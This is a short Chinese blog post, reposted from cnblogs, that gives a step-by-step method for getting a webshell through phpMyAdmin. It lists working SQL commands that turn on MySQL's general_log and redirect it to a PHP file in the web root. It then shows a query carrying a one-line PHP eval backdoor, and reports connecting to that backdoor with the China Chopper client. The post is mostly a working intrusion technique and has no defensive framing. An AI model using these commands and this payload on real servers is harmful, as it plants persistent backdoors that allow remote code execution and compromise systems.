码迷,mamicode.com
首页 > Web开发 > 详细

通过phpMyAdmin拿webshell

时间:2018-01-30 01:04:59      阅读:284      评论:0      收藏:0      [点我收藏+]

标签:alt   状态   gen   图片   shell   oba   global   nbsp   ble   

general_log默认为关闭的,root权限开启后,general_log_file会保存所有的查询语句

所以可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取webshell

进入phpMyAdmin后在SQL处执行SQL语句

首先查看general log是否开启

show variables like ‘general_log‘;

技术分享图片

general log是关闭状态,执行SQL语句开启general log

set global general_log=on;

技术分享图片

开启成功

然后把general_log_file设置为shell的绝对路径

SET global general_log_file=‘C:/phpStudy/PHPTutorial/WWW/x.php‘;

技术分享图片

创建的x.php里的内容

技术分享图片

然后执行SQL查询语句

SELECT ‘<?php @eval($_POST["x"]);?>‘;

执行成功

技术分享图片

看一下x.php里的内容

技术分享图片

成功插入了一句话木马

用菜刀连接,看看是否能够解析的

 技术分享图片

连接成功

通过phpMyAdmin拿webshell

标签:alt   状态   gen   图片   shell   oba   global   nbsp   ble   

原文地址:https://www.cnblogs.com/sch01ar/p/8380649.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!